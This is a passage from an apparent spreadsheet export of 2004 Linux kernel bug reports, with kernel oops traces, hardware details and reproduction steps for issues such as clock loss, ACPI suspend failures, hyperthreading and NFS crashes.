(MacPhyter) Ethernet Controller (rev 0). IRQ 11. Master Capable. Latency=32. Min Gnt=11.Max Lat=52. I/O at 0xc000 [0xc0ff]. Non-prefetchable 32 bit memory at 0xdc010000 [0xdc010fff]. Bus 2, device 0, function 0: VGA compatible controller: nVidia Corporation NV28 [GeForce4 Ti 4200 AGP 8x] (rev 161). IRQ 11. Master Capable. Latency=248. Min Gnt=5.Max Lat=1. Non-prefetchable 32 bit memory at 0xe0000000 [0xe0ffffff]. Prefetchable 32 bit memory at 0xd0000000 [0xd7ffffff]. -Regards Mikael Leivisk</t>
  </si>
  <si>
    <t>System Clock Losses time -- severly 70% 'tick' loss</t>
  </si>
  <si>
    <t>2.6.3, 2.6.4 (probably all 2.6)</t>
  </si>
  <si>
    <t>2004-03-14 14:20 UTC</t>
  </si>
  <si>
    <t>Hal King</t>
  </si>
  <si>
    <t>2004-03-29 10:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Buffalo/Slackware Hardware Environment: 1.2 GHZ AMD Duron Processer and many others Software Environment: i586 arch, running ICEWM 1.2.13, xcdroast, cp Problem Description: Heavy file IO (and any heavy resource use) seems to prevent the system time from being updated. Copying large files can cause up to 70% loss of clock time. NOTE: This doe NOT appear to cause any direct system or application 'crashes' Just can't use this kernal (directly) and display system time -- LOOKS REAL BAD! Temporary fix being used is a background process to check for the problem against the hardware clock -- resetting when needed. Steps to reproduce: Copy any large file that takes several minutes, Or create a CD ISO file, or a burn a CD. Compare system time to reference before and after. HOPEFULLY, this is a known issue -- but I can't make this bugzilla come up with it.</t>
  </si>
  <si>
    <t>kernel BUG at kernel/printk.c:568 !</t>
  </si>
  <si>
    <t>2004-03-15 06:31 UTC</t>
  </si>
  <si>
    <t>2004-05-31 09:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian (unstable) Hardware Environment: (Duron 1ghz, pcchips m810, 368 ram, video sis 630) Problem Description: Kernel panic on boot Error: kernel BUG at kernel/printk.c:568 ! invalid operand: 0000 [#1] PREEMPT CPU:0 EIP: 0060 [&lt;c0120510&gt;] not tainted VLI EFLAGS: 00010206 (2.6.4-mm1) EIP is at acquire_console_sem+0x10/0x40 eax: d77de000 ebx: 00000000 ecx: c024a1f0 edx: d75bcbc0 esi: d755d000 edi: d756cbc0 ebp: 00000001 esp: 277def18 ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo: d77de000 task: d778f680) Stack: c024a208 ffffffed d755d000 d756cbc0 c023af9f 0002bf00 00500001 d755d000 00000000 d77de000 c04a5420 d75666d4 00000000 c015bd2c 00000001 00000000 d756cbc0 00000000 d756cbc0 d75666d4 d77e4800 d756f200 c01527fc 00003a26 Call Trace: [&lt;c024a208&gt;] con_open+0x18/0xb0 [&lt;c023af9f&gt;] tty_open+0x20f/0x330 [&lt;c015bd2c&gt;] chrdev_open+0xec/0x210 [&lt;01527fc&gt;] dentry_open+0x13c/0x200 [&lt;c01526bc&gt;] filp_open+0x4c/0x50 [&lt;c0152b2d&gt;] sys_open+0x4d/0x80 [&lt;c0103090&gt;] init+0x0/0x170 [&lt;c0103140&gt;] init+0xb0/0x170 [&lt;c010727d&gt;] kernel_thread_helper+0x5/0x18 Code: fa 37 0f 8f 26 ff ff ff 80 7b 02 3e 0f 85 1c ff ff ff e9 40 ff ff ff 8d 74 26 00 b8 00 f0 ff ff 21 e0 f7 40 14 00 ff ff 00 74 08 &lt;0f&gt; 0b 38 02 7e 28 38 c0 b9 50 76 3d c0 ff 0d 50 76 3d c0 0f 88 &lt;0&gt; Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing</t>
  </si>
  <si>
    <t>2.6.4-mm2 oopses on boot</t>
  </si>
  <si>
    <t>2.6.4-mm2</t>
  </si>
  <si>
    <t>2004-03-15 13:24 UTC</t>
  </si>
  <si>
    <t>2004-03-15 14:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Rawhide Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL) Software Environment: preempt ext3 raid1 root Problem Description: 2.6.4-mm2 oopses on boot (so does -mm1, but differently. -mm1 error loops, -mm2 oopses a single time) 2.6.4-rc1-mm2 is fine</t>
  </si>
  <si>
    <t>suspend to disk (ACPI S4, swsusp) fails with intel-agp loaded</t>
  </si>
  <si>
    <t>2004-03-16 07:34 UTC</t>
  </si>
  <si>
    <t>2006-01-04 22:36 UTC</t>
  </si>
  <si>
    <t>Distribution: SUSE Linux 9.1 beta Hardware Environment: HP compaq nx5000 intel centrino notebook Software Environment: n/a, happens even with init=/bin/bash Problem Description: resume from swsusp hangs near "waiting for DMAs to settle down" Steps to reproduce: boot with "init=/bin/bash rw", mount /proc /sbin/swapon -a modprobe intel-agp echo 4 &gt; /proc/acpi/sleep boot with "resume=/dev/hdaX" hdaX being your swap partition The machine will hang on resume (tested on different machines). If X was used before suspend, the machine may also reboot spontaneously during the resume process. If the intel-agp module is not used, the resume works just fine.</t>
  </si>
  <si>
    <t>How to disable HT</t>
  </si>
  <si>
    <t>2004-03-16 11:19 UTC</t>
  </si>
  <si>
    <t>2004-04-13 23:18 UTC</t>
  </si>
  <si>
    <t>acpi_config-processors</t>
  </si>
  <si>
    <t>Kernel config adds HT support when the CPU family supports it and CONFIG_SMP is enabled. It is not possible to disable CONFIG_HT if these two are true. The intent of this design is to "do the right thing" for the typical user by minimizing config surprises for the common case. However, this frustrates experts who wish to disable HT. Kernel boot flags used to include "noht" -- but it was broken so it was deleted. Further, "acpi=off" is (intentionally) not effective at disabling HT. So how can one disable HT? 1. BIOS SETUP This is always the preferred method. The reason is if an HT implementation requires special initialization to optimally coalesce duplicated hardware resources, the BIOS will know how to do it. OS methods may run too late to be effective and so maximum UP performance may not be reached. However, some OEMs do not provide a !HT BIOS SETUP option. Also, sometimes it is not practical to run BIOS SETUP -- such as on a large cluster of systems. 2. Run a UniProcessor Kernel The UP kernel will never start up logical processors, but this has 2 problems. A. only appropriate for a single physical processor system. Systems with multiple physical processors will run just 1 processor when running the UP kernel. B. popular distro kernels exclude IOAPIC support from UP kernel. The workaround is to boot the SMP kernel with "maxcpus=1" so that it will run just 1 processor and still enable the IOAPIC. (n.b. "nosmp" and "maxcpus=0" will also run just 1 processor, but will disable the IOAPIC, which is sub-optimal) 3. build-time CPU enumeration order Intel's BIOS writer's guide suggests that vendors enumerate processors physical first, and then logical. This is why you may see processor LAPIC numbers enumerated 0,6,1,7 -- for example. 0 and 6 are primary, and 1 and 7 are secondary siblings. The CPU enumeration code will refuse to add more than NR_CPUS processors. If the system follows the guidelines., then NR_CPUS can be used to enable just the physical processors and exclude the logical siblings. However, this requires a kernel re-build to tune NR_CPUS. Note that not all BIOS vendors enumerate processors in this order. But if they do, the following boot messages confirm that HT is disabled (here 2 physical of 4 logical processors are started) Total of 2 processors activated (11091.96 BogoMIPS). WARNING: No sibling found for CPU 0. WARNING: No sibling found for CPU 1. 4. boot-time CPU enumeration order maxcpus=N currently runs at smpboot time, when the processors are started in LAPIC order, eg 0,1,6,7 -- so it is not effective for disabling siblings. However a patch to this bug report will move maxcpus=N processing to enumeration time, where it will effectively be the boot-time equivalent of method #3 above. 5. LAPIC id decoding at enumeration time Per the documentation on http://developer.intel.com/technology/hyperthread/ the package numbers and sibling numbers are encoded in the local-APIC id. It is possible at cpu-enumeration time to run CPUID to identify the number of siblings, and then decode the LAPIC numbers as given in the ACPI MADT, refusing to enumerate processors that are logical siblings. The problem with this is that the LAPIC-id is programmable, and may have been over-written by the OEM's BIOS such that it no longer properly encodes the package/sibling bits. 6. Run-time CPUID The RESET-LAPIC-id can be accessed by running the CPUID instruction. This is not re-programmable, and thus is not subject to error such as the LAPIC-id in technique #3. But there are two problems with this technique: A. CPUID must run on the local processor. This means that the processor must be started up in order to learn if it should be started up or not... When Linux has reliable cpu offline features, this will be the preferred way to offline logical HT siblings. But Linux does not currently have cpu offline features. B. exotic hardware, such as the the IBM Summit, does not give an appropriate answer in the RESET-LAPIC-id. This, however, is a CPU sub-architecture issue.</t>
  </si>
  <si>
    <t>No ACPI button after sucessfull S3 resume on L3800C (nb not duplicate of 1409, 1661)</t>
  </si>
  <si>
    <t>2.6.5-rc1-mm1</t>
  </si>
  <si>
    <t>2004-03-17 05:04 UTC</t>
  </si>
  <si>
    <t>Eric Valette</t>
  </si>
  <si>
    <t>2004-07-17 17:12 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian Sid Hardware Environment: ASUS L3800C Software Environment: gcc 3.3.3 Problem Description: On this laptop, with this kernel version and passing acpi_sleep=s3_bios works like a charm. I do not have to unload any module, or switch away from X. So I would be perfectly happy if after resume, the ACPI buttons were still functionning. I would like to publickly thank Karol Kosimor for that (as well as for acpi4asus). I had first to avoid to get a spurious PWR button event causing to shutdown immediately after resume using a simple lockfile. But once I fixed this, I tried to repush the Sleep button without luck. Using the script /etc/acpi/sleepbtn.sh works however. Steps to reproduce: Push the sleep button, resume, try to push the sleep button again... NB : the patch http://bugme.osdl.org/attachment.cgi?id=1208&amp;action=view suggested by Karol kosimor and that does the trick for him, does not work for me. I've asked hime to compare his working .config with mine attached. NB2 : I also tested another patch to enable /proc/acpi/wakeup_devices and enabled the sleep button there without luck.</t>
  </si>
  <si>
    <t>2004-03-19 02:05 UTC</t>
  </si>
  <si>
    <t>Marcus Meissner</t>
  </si>
  <si>
    <t>2004-07-17 18:12 UTC</t>
  </si>
  <si>
    <t>Distribution: ppc64 Hardware Environment: Apple G5 Software Environment: suse linux 9.1 inhouse + gcc 3.3.3+hammer branch Problem Description: The sound/ppc/powermac.c specifies a MODULE PARAMETER "enable", which is only referenced in non.module mode. If compiled as module, a modprobe results in "snd_powermac: falsely claims to have parameter enable". this is due to -funit-at-a-time removing the static variable "enable" because it is unused throughout the file in non.module mode. Please just remove all references to enable, including from the builtin-in setup function. Steps to reproduce: modprobe snd-powermac when compiled with gcc 3.3-hammer, gcc3.4 or later.</t>
  </si>
  <si>
    <t>si_band must be long int</t>
  </si>
  <si>
    <t>PPC-64</t>
  </si>
  <si>
    <t>2004-03-19 02:27 UTC</t>
  </si>
  <si>
    <t>2004-04-05 04:28 UTC</t>
  </si>
  <si>
    <t>Dave Engebretsen</t>
  </si>
  <si>
    <t>Distribution: suse linux enterprise server 9 beta1 Hardware Environment: ppc64 Software Environment: gcc-3.3.3 hammer + suse linux enterprise server 9 Problem Description: The si_band component of the siginfo struct needs to be long int. this has been discussed on the libc-alpha / hackers mailinglist. So asm-ppc64/siginfo.h should cntain: #define __ARCH_SI_BAND_T long just like asm-x86_64/siginfo.h for instance to make it compatible with glibc again. Steps to reproduce: Check that si_band is long in asm-ppc64/siginfo.h</t>
  </si>
  <si>
    <t>Can't eject Aironet 350 PCMCIA card (device busy)</t>
  </si>
  <si>
    <t>2.6.4 vanilla</t>
  </si>
  <si>
    <t>2004-03-20 08:15 UTC</t>
  </si>
  <si>
    <t>Silvio B</t>
  </si>
  <si>
    <t>2004-12-24 15:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: IBM Thinkpad T22 Software Environment: Problem Description: The Cisco Aironet 350 WLAN PCMCIA card can't be ejected as there is a kernel process [eth1] which always uses the airo_cs module. I currently don't have a WLAN so I cannot tell whether the device is working properly, but according to the status lights it is. It used to work in 2.4.x kernels and has not been working since at least 2.6.0. Don't hesitate to ask me for any additional information you might need, thanks for the great 2.6 kernel! Steps to reproduce: // inserting the Cisco Aironet 350 card: cs: memory probe 0xa0000000-0xa0ffffff: clean. hagrid:~# airo: cmd= 111 airo: status= 7f11 airo: Rsp0= 2 airo: Rsp1= 0 airo: Rsp2= 0 Ignoring unknown interface eth1=hotplug. Ignoring unknown interface wifi0=hotplug. airo: MAC enabled eth1 0:7:e:b4:1f:bc eth1: index 0x05: Vcc 5.0, Vpp 5.0, irq 5, io 0x0100-0x013f // the light on the card begins to flash, it seems like it is working // (can't test here as I have no WLAN at the moment). But it doesn't // appear in ifconfig: hagrid:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:03:47:92:9B:13 inet addr:172.17.8.210 Bcast:172.17.8.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:38272 errors:0 dropped:0 overruns:0 frame:0 TX packets:22961 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:34082796 (32.5 MiB) TX bytes:3594948 (3.4 MiB) Interrupt:11 Base address:0x4000 irda0 Link encap:IrLAP HWaddr 00:00:00:00 UP RUNNING NOARP MTU:2048 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:41730 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:8 RX bytes:0 (0.0 b) TX bytes:1299588 (1.2 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:711 errors:0 dropped:0 overruns:0 frame:0 TX packets:711 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:46875 (45.7 KiB) TX bytes:46875 (45.7 KiB) hagrid:~# ifconfig eth1 eth1 Link encap:Ethernet HWaddr 00:07:0E:B4:1F:BC BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:5 Base address:0x100 hagrid:~# ifconfig eth1 up hagrid:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:03:47:92:9B:13 inet addr:172.17.8.210 Bcast:172.17.8.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:38364 errors:0 dropped:0 overruns:0 frame:0 TX packets:23030 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:34092888 (32.5 MiB) TX bytes:3600743 (3.4 MiB) Interrupt:11 Base address:0x4000 eth1 Link encap:Ethernet HWaddr 00:07:0E:B4:1F:BC UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:5 Base address:0x100 irda0 Link encap:IrLAP HWaddr 00:00:00:00 UP RUNNING NOARP MTU:2048 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:41965 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:8 RX bytes:0 (0.0 b) TX bytes:1306910 (1.2 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:711 errors:0 dropped:0 overruns:0 frame:0 TX packets:711 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:46875 (45.7 KiB) TX bytes:46875 (45.7 KiB) hagrid:~# ifconfig eth1 down // There is some (kernel?) thread which uses the airo_cs module and prevents // ejecting the card using cardctl: hagrid:~# ps -aux [...] root 8167 1.2 0.1 1540 700 ? S 17:02 0:00 /sbin/cardmgr root 8170 0.0 0.0 0 0 ? SW 17:02 0:00 [eth1] [...] hagrid:~# lsmod Module Size Used by usb_storage 68032 0 uhci_hcd 32752 0 airo_cs 7460 1 airo 67720 1 airo_cs sd_mod 14112 0 videodev 9696 0 sr_mod 16036 0 scsi_mod 72072 3 usb_storage,sd_mod,sr_mod pktcdvd 31008 1 nsc_ircc 16956 0 irda 139164 1 nsc_ircc lp 11108 0 snd_pcm_oss 54660 0 snd_mixer_oss 20096 1 snd_pcm_oss snd_cs46xx 84516 1 snd_rawmidi 24928 1 snd_cs46xx snd_seq_device 8072 1 snd_rawmidi snd_ac97_codec 63588 1 snd_cs46xx snd_pcm 101092 2 snd_pcm_oss,snd_cs46xx snd_timer 25988 1 snd_pcm snd 55332 10 snd_pcm_oss,snd_mixer_oss,snd_cs46xx,snd_rawmidi,snd_seq_device,snd_ac97_codec,snd_pcm,snd_timer soundcore 9856 1 snd snd_page_alloc 12196 2 snd_cs46xx,snd_pcm joydev 10048 0 evdev 9248 0 hagrid:~# cardctl eject ioctl(): Device or resource busy</t>
  </si>
  <si>
    <t>yenta kills uhci and cardbus on boot</t>
  </si>
  <si>
    <t>2004-03-20 13:07 UTC</t>
  </si>
  <si>
    <t>Bart Verwilst</t>
  </si>
  <si>
    <t>2005-02-17 02:26 UTC</t>
  </si>
  <si>
    <t>platform_other</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Intel Mobile Intel(R) Pentium(R) 4 - M CPU 2.20GHz stepping 09 Problem Description: I have a netgear wireless card (prism54 driver) in pcmcia.. on bootup, the following happens *sometimes*... &lt;see attached output&gt; Which disables UHCI, firewire and the cardbus, since they seem to be sharing the same IRQ or something :$ What i'm trying now is the following: I have uhci compiled into the kernel, and yenta_socket loaded as a module.. It seems to work for now.. Maybe because uhci and yenta load +- at the same time, they something bash eachother up because of the irc or something? :) Steps to reproduce: Boot system with UHCI and yenta_socket compiled in kernel..</t>
  </si>
  <si>
    <t>2.6.5-rc2</t>
  </si>
  <si>
    <t>Radeon framebuffer is a mess</t>
  </si>
  <si>
    <t>2.6.9</t>
  </si>
  <si>
    <t>2004-03-21 04:25 UTC</t>
  </si>
  <si>
    <t>Jan Outhuis</t>
  </si>
  <si>
    <t>2005-08-15 17:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Pentium 4 Xeon, Radeon rv280 9200 chipset (id 5961) on Sapphire video adapter. Software Environment: gcc 3.3.3, glibc 2.3.2 Problem Description: Radeon framebuffer on the console is a mess: fbset settings are not reproduced correctly, and are not kept on switching console. Radeon rv280 9200 is not defined in ../drivers/video/radeonfb.c, (it is defined in ../drivers/video/aty/radeonbase.c, though). Steps to reproduce: run a 2.6.4 kernel with radeonfb configured in, and configure the console with fbset.</t>
  </si>
  <si>
    <t>Core Dump when shareing files with SUN automounter</t>
  </si>
  <si>
    <t>2004-03-23 08:05 UTC</t>
  </si>
  <si>
    <t>2004-04-06 12:55 UTC</t>
  </si>
  <si>
    <t>Distribution: self Hardware Environment: ASUS A7V8x / Athlon 2400+ Software Environment: Problem Description: The linux box (isbetter) exports NFS file system to a Solaris 2.8 box (sonne). After some time the nfsd on linux box crashes. I think it happens after some unmounts of the Solaris automounter and remounting the same directory when accessing some files. It does not appear with 2.6.2. Here the dump: Mar 23 16:29:05 isbetter rpc.mountd: authenticated mount request from sonne:781 for /home (/home) Mar 23 16:29:11 isbetter kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000004 Mar 23 16:29:11 isbetter kernel: printing eip: Mar 23 16:29:11 isbetter kernel: c03a6ac8 Mar 23 16:29:11 isbetter kernel: *pde = 00000000 Mar 23 16:29:11 isbetter kernel: Oops: 0000 [#1] Mar 23 16:29:11 isbetter kernel: PREEMPT Mar 23 16:29:11 isbetter kernel: CPU: 0 Mar 23 16:29:11 isbetter kernel: EIP: 0060:[ip_append_page+328/992] Not tainted Mar 23 16:29:11 isbetter kernel: EFLAGS: 00010287 Mar 23 16:29:11 isbetter kernel: EIP is at ip_append_page+0x148/0x3e0 Mar 23 16:29:11 isbetter kernel: eax: c4eb22c8 ebx: c17ca320 ecx: 00000001 edx: 00000000 Mar 23 16:29:11 isbetter kernel: esi: 00000008 edi: 00000000 ebp: c4eb22d0 esp: c4dbde30 Mar 23 16:29:11 isbetter kernel: ds: 007b es: 007b ss: 0068 Mar 23 16:29:11 isbetter kernel: Process nfsd (pid: 650, threadinfo=c4dbc000 task=c4e686c0) Mar 23 16:29:11 isbetter kernel: Stack: c53c9454 00000014 000005c4 00000010 c53c9528 c53c95c8 c53c9400 00000000 Mar 23 16:29:11 isbetter kernel: 00000008 c03c36e1 c53c9400 00000000 00000000 00000008 00000000 c01e6d69 Mar 23 16:29:11 isbetter kernel: c4dbde74 00000000 c4f81680 c4e7be80 00000000 c4dbdef4 00000001 c53c9400 Mar 23 16:29:11 isbetter kernel: Call Trace: Mar 23 16:29:11 isbetter kernel: [udp_sendpage+113/272] udp_sendpage+0x71/0x110 Mar 23 16:29:11 isbetter kernel: [nfsd_readdir+89/224] nfsd_readdir+0x59/0xe0 Mar 23 16:29:11 isbetter kernel: [inet_sendpage+112/160] inet_sendpage+0x70/0xa0 Mar 23 16:29:11 isbetter kernel: [svc_sendto+294/592] svc_sendto+0x126/0x250 Mar 23 16:29:11 isbetter kernel: [svc_udp_sendto+16/48] svc_udp_sendto+0x10/0x30 Mar 23 16:29:11 isbetter kernel: [svc_send+180/256] svc_send+0xb4/0x100 Mar 23 16:29:11 isbetter kernel: [svc_process+447/1616] svc_process+0x1bf/0x650 Mar 23 16:29:11 isbetter kernel: [nfsd+474/928] nfsd+0x1da/0x3a0 Mar 23 16:29:11 isbetter kernel: [nfsd+0/928] nfsd+0x0/0x3a0 Mar 23 16:29:11 isbetter kernel: [kernel_thread_helper+5/16] kernel_thread_helper+0x5/0x10 Mar 23 16:29:11 isbetter kernel: Mar 23 16:29:11 isbetter kernel: Code: ff 47 04 8b 83 a8 00 00 00 8d 04 c8 8d 50 10 89 78 10 8b 44 Steps to reproduce: 1) share file system of a linux box do Solaris 2.8 system 2) work on the exported file system on solaris box 3) wait some time (i think critical is the unmount of solaris automounter) 4) reenter shared filesystem on solaris box</t>
  </si>
  <si>
    <t>AE_NOT_ACQUIRED unless pci=noacpi</t>
  </si>
  <si>
    <t>2004-03-24 20:04 UTC</t>
  </si>
  <si>
    <t>2004-04-01 00:27 UTC</t>
  </si>
  <si>
    <t>Marcel Holtmann reports: ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 22 low level) ... ACPI: Subsystem revision 20040311 ACPI: SCI (IRQ22) allocation failed ACPI-0133: *** Error: Unable to install System Control Interrupt Handler, AE_NOT_ACQUIRED ACPI: Unable to start the ACPI Interpreter ... ACPI: ACPI tables contain no PCI IRQ routing entries PCI: Invalid ACPI-PCI IRQ routing table PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Enabled i801 SMBus device Transparent bridge - 0000:00:1e.0 PCI: Using IRQ router PIIX/ICH [8086/2440] at 0000:00:1f.0 PCI BIOS passed nonexistent PCI bus 0! PCI BIOS passed nonexistent PCI bus 0! There are two bugs here. 1. non graceful failure upon AE_NOT_ACQUIRED 2. AE_NOT_ACQUIRED on non-identity mapped SCI over-ride.</t>
  </si>
  <si>
    <t>kernel BUG at inode.c:334!</t>
  </si>
  <si>
    <t>2.4.25</t>
  </si>
  <si>
    <t>2004-03-24 23:32 UTC</t>
  </si>
  <si>
    <t>Fredrik Steen</t>
  </si>
  <si>
    <t>2004-03-29 09:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux Hardware Environment: IBM Netfinity 6000 / ICP Vortex / EXP300 Disk cabinet Software Environment: Vanilla Debian GNU/Linux (woody) Problem Description: kernel BUG at inode.c:334! invalid operand: 0000 CPU: 1 EIP: 0010:[&lt;c014b8bc&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010202 eax: f7b0606c ebx: 0000000f ecx: ee95c228 edx: f7b06000 esi: ee95c220 edi: f7b06064 ebp: f7b0606c esp: f031df88 ds: 0018 es: 0018 ss: 0018 Process fsstress (pid: 883, stackpage=f031d000) Stack: f7b06000 f031c000 bffffb94 bffff918 f7b06064 c014bd16 f7b06000 00000000 c0137e4e 00000000 f031c000 400135cc c0137eab 00000000 c0106e77 4012ee48 4012ad74 080505a0 400135cc bffffb94 bffff918 00000024 0000002b 0000002b Call Trace: [&lt;c014bd16&gt;] [&lt;c0137e4e&gt;] [&lt;c0137eab&gt;] [&lt;c0106e77&gt;] Code: 0f 0b 4e 01 b5 a5 2a c0 89 d8 0c 08 24 f8 89 86 1c 01 00 00 &gt;&gt;EIP; c014b8bc &lt;sync_inodes_sb+90/250&gt; &lt;===== &gt;&gt;eax; f7b0606c &lt;_end+3777e8e8/3865b8dc&gt; &gt;&gt;ecx; ee95c228 &lt;_end+2e5d4aa4/3865b8dc&gt; &gt;&gt;edx; f7b06000 &lt;_end+3777e87c/3865b8dc&gt; &gt;&gt;esi; ee95c220 &lt;_end+2e5d4a9c/3865b8dc&gt; &gt;&gt;edi; f7b06064 &lt;_end+3777e8e0/3865b8dc&gt; &gt;&gt;ebp; f7b0606c &lt;_end+3777e8e8/3865b8dc&gt; &gt;&gt;esp; f031df88 &lt;_end+2ff96804/3865b8dc&gt; Trace; c014bd16 &lt;sync_inodes+36/4c&gt; Trace; c0137e4e &lt;fsync_dev+3a/80&gt; Trace; c0137eab &lt;sys_sync+7/10&gt; Trace; c0106e77 &lt;system_call+33/38&gt; Code; c014b8bc &lt;sync_inodes_sb+90/250&gt; 00000000 &lt;_EIP&gt;: Code; c014b8bc &lt;sync_inodes_sb+90/250&gt; &lt;===== 0: 0f 0b ud2a &lt;===== Code; c014b8be &lt;sync_inodes_sb+92/250&gt; 2: 4e dec %esi Code; c014b8bf &lt;sync_inodes_sb+93/250&gt; 3: 01 b5 a5 2a c0 89 add %esi,0x89c02aa5(%ebp) Code; c014b8c5 &lt;sync_inodes_sb+99/250&gt; 9: d8 0c 08 fmuls (%eax,%ecx,1) Code; c014b8c8 &lt;sync_inodes_sb+9c/250&gt; c: 24 f8 and $0xf8,%al Code; c014b8ca &lt;sync_inodes_sb+9e/250&gt; e: 89 86 1c 01 00 00 mov %eax,0x11c(%esi) Steps to reproduce: 1) Download the latest LTP testsuite 2) Build and install the testsuite 3) Make sure the NFS server daemons are running 4) Export an XFS filesystem to be used for testing, globally, with root allowed. ex: /mnt/xfs *(sync,rw, no_root_squash) 5) Change directory to where the LTP is installed 6) Change directory to testcases/bin/ 7) Execute 'nfs_fsstress.sh' and follow the prompts. a) Enter your hostname as the server b) Enter the export filesystem name, i.e. /mnt/xfs c) Enter "10" for the number of hours to execute. The oops should occur within 2-3h or so. This was found when trying to resolve XFS bug: http://oss.sgi.com/bugzilla/show_bug.cgi?id=309</t>
  </si>
  <si>
    <t>spelling mistake</t>
  </si>
  <si>
    <t>2004-03-25 21:03 UTC</t>
  </si>
  <si>
    <t>ren.j.y</t>
  </si>
  <si>
    <t>2004-07-10 12:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: "net/key/Af_key.c:pfkey_send_new_mapping():2638" "SADB_EXT_ADDRESS_SRC" should be "SADB_EXT_ADDRESS_DST" Steps to reproduce:</t>
  </si>
  <si>
    <t>PM timer runs too fast</t>
  </si>
  <si>
    <t>2004-03-26 05:18 UTC</t>
  </si>
  <si>
    <t>2006-12-04 11:48 UTC</t>
  </si>
  <si>
    <t>the ACPI PM timer runs exactly twice as fast as it should. I append the dmidecode output. This is a Gigabyte Board with ALADDIN5 chipset. ACPI runs very nice on that system with acpi=force, just the new PM timer is *a bit* too fast. If you need more information, let me know. Steps to reproduce: SMBIOS 2.2 present. DMI 2.2 present. 32 structures occupying 795 bytes. DMI table at 0x000F0800. Handle 0x0000 DMI type 0, 19 bytes. BIOS Information Block Vendor: Award Software International, Inc. Version: 4.51 PG Release: 09/19/00 BIOS base: 0xE0000 ROM size: 64K Capabilities: Flags: 0x000000007FCBDE90 Handle 0x0001 DMI type 1, 25 bytes. System Information Block Vendor: Product: Version: Serial Number: Handle 0x0002 DMI type 2, 8 bytes. Board Information Block Vendor: Product: ALADDIN5 Version: Serial Number: Handle 0x0003 DMI type 3, 13 bytes. Chassis Information Block Vendor: Chassis Type: Unknown Version: Serial Number: Asset Tag: Handle 0x0004 DMI type 4, 32 bytes. Processor Socket Designation: Socket 7 Processor Type: Central Processor Processor Family: K5 Family Processor Manufacturer: AMD Processor Version: AMD-K6 Handle 0x0005 DMI type 5, 28 bytes. Memory Controller Handle 0x0006 DMI type 6, 12 bytes. Memory Bank Socket: A0 Banks: 0 1 Speed: 60nS Type: PARITY ECC DIMM SDRAM Installed Size: 128Mbyte Enabled Size: 128Mbyte Handle 0x0007 DMI type 6, 12 bytes. Memory Bank Socket: A1 Banks: 0 1 Speed: 60nS Type: PARITY ECC DIMM SDRAM Installed Size: 128Mbyte Enabled Size: 128Mbyte Handle 0x0008 DMI type 6, 12 bytes. Memory Bank Socket: A2 Banks: 2 3 Speed: 60nS Type: PARITY ECC DIMM SDRAM Installed Size: 128Mbyte Enabled Size: 128Mbyte Handle 0x0009 DMI type 6, 12 bytes. Memory Bank Socket: A3 Banks: 2 3 Speed: 60nS Type: FPM PARITY ECC Installed Size: 128Mbyte Enabled Size: 128Mbyte Handle 0x000A DMI type 6, 12 bytes. Memory Bank Socket: A4 Banks: 4 5 Speed: 60nS Type: UNKNOWN Installed Size: 64Mbyte Enabled Size: 64Mbyte Handle 0x000B DMI type 6, 12 bytes. Memory Bank Socket: A5 Banks: 4 5 Speed: 60nS Type: UNKNOWN Installed Size: 64Mbyte Enabled Size: 64Mbyte Handle 0x000C DMI type 7, 19 bytes. Cache Socket: Internal Cache L1 Internal Cache: write-back L1 Cache Size: 64K L1 Cache Maximum: 64K L1 Cache Type: Synchronous Handle 0x000D DMI type 7, 19 bytes. Cache Socket: External Cache L2 External Cache: write-back L2 Cache Size: 1024K L2 Cache Maximum: 512K L2 Cache Type: Synchronous Handle 0x000E DMI type 8, 9 bytes. Port Connector Internal Designator: PRIMARY IDE Internal Connector Type: On Board IDE External Designator: External Connector Type: None Port Type: Other Handle 0x000F DMI type 8, 9 bytes. Port Connector Internal Designator: SECONDARY IDE Internal Connector Type: On Board 